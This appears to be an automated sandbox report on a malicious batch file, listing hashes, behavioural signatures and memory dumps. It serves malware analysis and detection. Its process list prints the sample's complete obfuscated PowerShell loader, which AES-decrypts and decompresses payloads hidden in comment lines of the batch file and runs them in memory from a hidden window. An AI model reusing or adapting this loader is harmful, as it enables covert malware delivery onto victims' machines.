Analysis
-
max time kernel
119s -
max time network
126s -
platform
windows7_x64 -
resource
win7-20240419-en -
resource tags
arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system -
submitted
25-05-2024 14:03
Static task
static1
Behavioral task
behavioral1
Sample
coin.b.bat
Resource
win7-20240419-en
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
coin.b.bat
Resource
win10v2004-20240508-en
22 signatures
150 seconds
General
-
Target
coin.b.bat
-
Size
91KB
-
MD5
520c1190bbbe3a7359a6e72f76618245
-
SHA1
50d5e441a97aad127e8d5ad8c28c848b3be02c5d
-
SHA256
91813779ab003d08ee337226c9ba845aaca64098e9740e6aaf30a0c8fa833ee0
-
SHA512
98ebc8ee9b1b1d7302a5771f1e6b174903a9c249459a98e57e8cd48ce8760997b414246c7c9f05d1ce08fa299dcc2496c389b4126af647e8f2a6e9f81d15f749
-
SSDEEP
1536:HtkPhsAgh2YhIXwWIN0hdI7E5WQTpJlqb3mE81vT1dkYHcga3kplWaEDN4nVoLuR:NeCAgX+vIuEE5PlJAb3mE81L1dkhX3mV
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2212 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2212 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 2320 wrote to memory of 2212 2320 cmd.exe powershell.exe PID 2320 wrote to memory of 2212 2320 cmd.exe powershell.exe PID 2320 wrote to memory of 2212 2320 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\coin.b.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('c8KZIt7om0GReP7FMEfz0SGLs2AMU+4GQioHMorebJA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aiKe9c65ZjFACO2EycWX2w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $MEUKW=New-Object System.IO.MemoryStream(,$param_var); $piWSe=New-Object System.IO.MemoryStream; $AfYrg=New-Object System.IO.Compression.GZipStream($MEUKW, [IO.Compression.CompressionMode]::Decompress); $AfYrg.CopyTo($piWSe); $AfYrg.Dispose(); $MEUKW.Dispose(); $piWSe.Dispose(); $piWSe.ToArray();}function execute_function($param_var,$param2_var){ $eWsMy=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $mbrUF=$eWsMy.EntryPoint; $mbrUF.Invoke($null, $param2_var);}$OUKqL = 'C:\Users\Admin\AppData\Local\Temp\coin.b.bat';$host.UI.RawUI.WindowTitle = $OUKqL;$FwHhv=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($OUKqL).Split([Environment]::NewLine);foreach ($oOibP in $FwHhv) { if ($oOibP.StartsWith(':: ')) { $aqXWs=$oOibP.Substring(3); break; }}$payloads_var=[string[]]$aqXWs.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/2212-4-0x000007FEF4B5E000-0x000007FEF4B5F000-memory.dmpFilesize
4KB
-
memory/2212-5-0x000000001B6A0000-0x000000001B982000-memory.dmpFilesize
2.9MB
-
memory/2212-6-0x0000000001E70000-0x0000000001E78000-memory.dmpFilesize
32KB
-
memory/2212-7-0x000007FEF48A0000-0x000007FEF523D000-memory.dmpFilesize
9.6MB
-
memory/2212-8-0x000007FEF48A0000-0x000007FEF523D000-memory.dmpFilesize
9.6MB
-
memory/2212-9-0x000007FEF48A0000-0x000007FEF523D000-memory.dmpFilesize
9.6MB
-
memory/2212-10-0x000007FEF48A0000-0x000007FEF523D000-memory.dmpFilesize
9.6MB